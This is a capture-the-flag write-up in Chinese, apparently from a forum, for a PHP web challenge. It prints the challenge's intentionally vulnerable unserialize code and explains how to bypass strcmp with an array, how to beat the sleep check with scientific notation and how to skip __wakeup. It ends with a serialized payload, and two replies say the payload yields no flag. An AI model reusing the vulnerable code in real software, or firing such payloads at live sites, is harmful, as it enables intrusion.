xuenixiang_2021_web_web200
直接看源码。<br>```
class Time{
public $flag = ******************;
public $truepassword = ******************;
public $time;
public $password ;
public function __construct($tt, $pp) {
$this->time = $tt;
$this->password = $pp;
}
function __destruct(){
if(!empty($this->password))
{
if(strcmp($this->password,$this->truepassword)==0){
echo "<h1>Welcome,you need to wait......<br>The flag will become soon....</h1><br>";
if(!empty($this->time)){
if(!is_numeric($this->time)){
echo 'Sorry.<br>';
show_source(__FILE__);
}
else if($this->time < 11 * 22 * 33 * 44 * 55 * 66){
echo 'you need a bigger time.<br>';
}
else if($this->time > 66 * 55 * 44 * 33 * 23 * 11){
echo 'you need a smaller time.<br>';
}
else{
sleep((int)$this->time);
var_dump($this->flag);
}
echo '<hr>';
}
else{
echo '<h1>you have no time!!!!!</h1><br>';
}
}
else{
echo '<h1>Password is wrong............</h1><br>';
}
}
else{
echo "<h1>Please input password..........</h1><br>";
}
}
function __wakeup(){
echo 'hello hacker,I have changed your password and time, rua!';
}
}
if(isset($_GET['rua'])){
$rua = $_GET['rua'];
@unserialize($rua);
}
else{
echo "<h1>Please don't stop rua 233333</h1><br>";
}
```
- 1
要求传入一个password与服务器设定的truepassword相等才能继续,这里可以运用双等号比较存在的弱类型绕过,让传入的password为一个数组即可。
- 2
要求传入一个time时间。sleep这些事件后会输出flag。而服务器要求time要在一个很大的数值区域内,正常传入需要等待几百天才能出flag。而可以看到
```
sleep((int)$this->time);
```
服务器对time进行了强制转换,所以可以用科学计数法或者进制转换来绕过前面的事件检测,int后数值很小就可以得到flag。
- 3
传入数据需要序列化传入,同时需要利用反序列化漏洞来防止__wekeup函数篡改我们的password。<br>
!()
将
```
O:4:"Time":2:{s:4:"time";s:5:"1.3e9";s:8:"password";a:1:{i:0;i:1;}}
```
中Time后的2改为比2大的数;即可绕过_wekeup。
故payload为:
```
?rua=O:4:"Time":3:{s:4:"time";s:5:"1.3e9";s:8:"password";a:1:{i:0;i:1;}}
```
!() 大佬,这道题没有flag出来https://z3.ax1x.com/2021/05/05/guHoP1.png
mosen 发表于 2021-5-5 03:03
大佬,这道题没有flag出来
请问解决了吗,我也是这样
页:
[1]